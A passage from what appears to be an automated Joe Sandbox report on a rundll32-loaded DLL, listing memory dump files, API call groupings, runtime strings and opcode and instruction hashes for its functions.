      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: f$f$p$p$f
      • API String ID: 3215553584-1325933183
      • Opcode ID: 60cc5941032d4e73c70e6236033a5792d810f6054c6545baca1d3859597e7a10
      • Instruction ID: 1da7f3d17b81cf6398a85a4ad5d22cd62852d82a194764ff71d46eb388f96ab5
      • Opcode Fuzzy Hash: 60cc5941032d4e73c70e6236033a5792d810f6054c6545baca1d3859597e7a10
      • Instruction Fuzzy Hash: 6E12F67270494A86FBAB9B14F15C3F97261F348770F84D015E6C547AE8DF3ACA898B50
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy
      • String ID: ios_base::failbit set
      • API String ID: 3630682930-3924258884
      • Opcode ID: c009e20e0163d43c03b6c8245f5196e59524e9394bb8ed14474b75b32bd38d0c
      • Instruction ID: b92572973f6f056b71fb1a3a17d0bce48dbe57363f560e11b7e88f697490d759
      • Opcode Fuzzy Hash: c009e20e0163d43c03b6c8245f5196e59524e9394bb8ed14474b75b32bd38d0c
      • Instruction Fuzzy Hash: 0EC1D032615B8881EB92DB25E4453ED7361E78DBE4F10D221EAAC067E6DF78C699C300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: AUX$COM$CON$LPT$NUL$PRN$\\.\
      • API String ID: 3668304517-431953350
      • Opcode ID: 50c9fd94dec52d2418c9c4644ecb9a1058296973547e3872325ecbe4daeaa39f
      • Instruction ID: 38d949412858d7621a5721e595f2d056ef18627934969283c6c0347f1df82c58
      • Opcode Fuzzy Hash: 50c9fd94dec52d2418c9c4644ecb9a1058296973547e3872325ecbe4daeaa39f
      • Instruction Fuzzy Hash: 747194B3714A88D1EFA28B25D0153E9B3A1F369BD4F94C112FA8D47694DE69CF4AC700
      APIs
      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000018000300F), ref: 00000001800085B9
        • Part of subcall function 00000001800150D0: OpenProcess.KERNEL32 ref: 000000018001510C
        • Part of subcall function 00000001800150D0: OpenProcess.KERNEL32 ref: 000000018001512C
        • Part of subcall function 00000001800150D0: GetLastError.KERNEL32 ref: 000000018001513E
        • Part of subcall function 00000001800150D0: CloseHandle.KERNEL32 ref: 000000018001542C
        • Part of subcall function 0000000180015470: GetModuleHandleW.KERNEL32 ref: 00000001800154DA
        • Part of subcall function 0000000180015470: GetProcAddress.KERNEL32 ref: 00000001800154EA
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008760
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Process$HandleOpen$AddressCloseCurrentErrorLastModuleProc_invalid_parameter_noinfo_noreturn
      • String ID: Crypto$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\Crypto.cpp$Process did not verify - %x - %u$Process in-memory image did not verify - %u - %s$VerifyProcess failed to get process path - %u$mb::common::crypto::VerifyProcessEx
      • API String ID: 3975211933-3964609968
      • Opcode ID: 8d988610b517b66eb06978deedab6b2115b64aa6f0835ac1fc9e9ed062743cc5
      • Instruction ID: 002036f762da34ff8db0a22a3868040925bfe3c3438f5634a40e792c62256954
      • Opcode Fuzzy Hash: 8d988610b517b66eb06978deedab6b2115b64aa6f0835ac1fc9e9ed062743cc5
      • Instruction Fuzzy Hash: F1511F76608B8982EB51CB54F49439AB7A1F78C7E4F508116FACD47699DF78C648CB00
      APIs
        • Part of subcall function 0000000180106750: AcquireSRWLockExclusive.KERNEL32(?,?,?,00000001800244B1,?,?,?,0000000180002C19), ref: 0000000180106760
      • GetModuleHandleW.KERNEL32 ref: 00000001800154DA
      • GetProcAddress.KERNEL32 ref: 00000001800154EA
        • Part of subcall function 00000001801066E4: AcquireSRWLockExclusive.KERNEL32(?,?,?,00000001800244DB,?,?,?,0000000180002C19), ref: 00000001801066F4
        • Part of subcall function 00000001801066E4: ReleaseSRWLockExclusive.KERNEL32(?,?,?,00000001800244DB,?,?,?,0000000180002C19), ref: 0000000180106734
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800156EC
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800156F2
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: ExclusiveLock$Acquire_invalid_parameter_noinfo_noreturn$AddressHandleModuleProcRelease
      • String ID: NtQuerySystemInformation$ntdll.dll
      • API String ID: 2734340950-3774135904
      • Opcode ID: 7b008e91cb76bd202fba05ef95906712dc144a287f15d9e36831c7d287c40dcb
      • Instruction ID: a10bd6991d194b5c177b67f4aac7a101da8466237153ef4756e3699e838ac3bb
      • Opcode Fuzzy Hash: 7b008e91cb76bd202fba05ef95906712dc144a287f15d9e36831c7d287c40dcb
      • Instruction Fuzzy Hash: 0561A272711F48D9FB52DB75D8483DD33A2AB4C7E8F50C225AA980B6E9DE74C689C340
      APIs
      • FreeLibrary.KERNEL32(?,?,0000000180130618,?,?,?,?,00000001801288C5,?,?,?,?,000000018010594C,?,?,00000000), ref: 000000018012FFA0
      • GetProcAddress.KERNEL32(?,?,0000000180130618,?,?,?,?,00000001801288C5,?,?,?,?,000000018010594C,?,?,00000000), ref: 000000018012FFAC
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: AddressFreeLibraryProc
      • String ID: api-ms-$ext-ms-
      • API String ID: 3013587201-537541572
      • Opcode ID: 7198340eb933fcddaf87aa1fa73f54ae1c1aa156182e913faa117afdfadb1161
      • Instruction ID: 03516c87bbbf3b13ccd75a7c17be7f6a40f8331a520ceada4aaaef6bbc0e6d97
      • Opcode Fuzzy Hash: 7198340eb933fcddaf87aa1fa73f54ae1c1aa156182e913faa117afdfadb1161
      • Instruction Fuzzy Hash: 4641D472321B1985FBA7DB1699087E62392B74DBF0F49C129ED0987799EE38C60D8700
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Lockitstd::_$Concurrency::cancel_current_taskLockit::_Lockit::~_
      • String ID: bad locale name$false$true
      • API String ID: 2115809835-1062449267
      • Opcode ID: 3eb764857571638ea639fc852bc58915e2b5e0f2f3e3f844ef9de042b42a80e1
      • Instruction ID: 0a47188049085c96de077126a6a7bc261e24a0e280c1158c0fa2977b959a987f
      • Opcode Fuzzy Hash: 3eb764857571638ea639fc852bc58915e2b5e0f2f3e3f844ef9de042b42a80e1
      • Instruction Fuzzy Hash: 0E819032205BC886EB56CF30E8843DE77A4FB98798F549115FA8817B69DF38C699C740
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: EventReset$Wait$MultipleMutexObjectObjectsReleaseSinglestd::bad_exception::bad_exception
      • String ID: cannot lock reader/writer lock
      • API String ID: 2438275785-3465051855
      • Opcode ID: da3257100d4325e52a0612eeb12e31ec67f956241cd1235f159f0b4ad8865caf
      • Instruction ID: 928cd7e5a2a3c19c91096689682fe9f00081523089b4839ba0cf6de9e0aa202b
      • Opcode Fuzzy Hash: da3257100d4325e52a0612eeb12e31ec67f956241cd1235f159f0b4ad8865caf
      • Instruction Fuzzy Hash: D0115172220A0D92EB92DF20E8947D97371F798F98F808021EA5D436AADF38C64DC740
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: ByteCharMultiStringWide
      • String ID:
      • API String ID: 2829165498-0
      • Opcode ID: 2059b5de93772b6589164b545c0d660cdabe6dbd7163e6b83504d15557ee1706
      • Instruction ID: a9fb6d0c5e32a15882cdf7d6f766ac3614fca2e62d703d427023a8a9716f6c71
      • Opcode Fuzzy Hash: 2059b5de93772b6589164b545c0d660cdabe6dbd7163e6b83504d15557ee1706
      • Instruction Fuzzy Hash: B681C572300B4886EBA1CF11E4583A977E1F788BF8F548215EA9957BE8DF7CC6098700
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
      • String ID:
      • API String ID: 2081738530-0
      • Opcode ID: e74defd6e44153776dcf575d9a0119c280fa8a440b153087fd78519c6dbb8ca4
      • Instruction ID: a17a6a9c76327ac1197ff84e204077398036305ebdd83819081fcd8ba0eb649b
      • Opcode Fuzzy Hash: e74defd6e44153776dcf575d9a0119c280fa8a440b153087fd78519c6dbb8ca4
      • Instruction Fuzzy Hash: 7F315432305B4885EBA6DF15E8443DA73A2F79DBE4F488221EA8D577A5DF38C649C700
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
      • String ID:
      • API String ID: 2081738530-0
      • Opcode ID: 2742c7814c3d9141867964d29c3211bf07c947db12c32302beb503fc19865477
      • Instruction ID: c59888543ef58e5a734107e20c96db3b83024bccbeb0ae9d9f276c0960d4cf20
      • Opcode Fuzzy Hash: 2742c7814c3d9141867964d29c3211bf07c947db12c32302beb503fc19865477
      • Instruction Fuzzy Hash: 7E317E32200B4884EBA6DB15E4443DA73A2F74DBE4F58C621EA9D173A6DE78C649C300
      APIs
      • GetLastError.KERNEL32(?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012AC37
      • FlsSetValue.KERNEL32(?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012AC6D
      • FlsSetValue.KERNEL32(?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012AC9A
      • FlsSetValue.KERNEL32(?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012ACAB
      • FlsSetValue.KERNEL32(?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012ACBC
      • SetLastError.KERNEL32(?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012ACD7
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Value$ErrorLast
      • String ID:
      • API String ID: 2506987500-0
      • Opcode ID: 36757262a35ff0a418cde6abc8dd7c87a5e57a68b04b148afcbd8265ab752082
      • Instruction ID: d213d25cf1d276d5630f7abeba5ae812c027ebe3f7d0956fbb059bd98219fbf6
      • Opcode Fuzzy Hash: 36757262a35ff0a418cde6abc8dd7c87a5e57a68b04b148afcbd8265ab752082
      • Instruction Fuzzy Hash: 66116D7020164C47FADBE7A1699D3EA63825B8CBF0F94C724A937477D6EE28C6194300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
      • String ID: string too long
      • API String ID: 3936042273-2556327735
      • Opcode ID: a2f15db28bc96a0d3fe94e1749557d9fb73bed376aeb445b49e40e8c97343fc8
      • Instruction ID: f6307991c770a111e731ac363c3614bd6e4c1c5c81b05f7b3cc911774e9de69b
      • Opcode Fuzzy Hash: a2f15db28bc96a0d3fe94e1749557d9fb73bed376aeb445b49e40e8c97343fc8
      • Instruction Fuzzy Hash: 1721C6B1711A4881EE8AE725D4493ED32929B4CBF5F90CA11E66D077D1DE29C6998300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: EventMultipleMutexObjectsReleaseResetWaitstd::bad_exception::bad_exception
      • String ID: cannot lock reader/writer lock
      • API String ID: 2739960895-3465051855
      • Opcode ID: 1af4f7dfb9ebc9c0bdea181eb432d002f952579437f4c92c9cbce27466e656b0
      • Instruction ID: 10f920412d7c47fb8d58a7fe2a1a522ce3c77fd6108f22b1ef94d16f7f12780f
      • Opcode Fuzzy Hash: 1af4f7dfb9ebc9c0bdea181eb432d002f952579437f4c92c9cbce27466e656b0
      • Instruction Fuzzy Hash: 64015272324E4D92EBA1DF14E8947D96361F798BA8F908111EA9D436A9DF68C74CC700
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
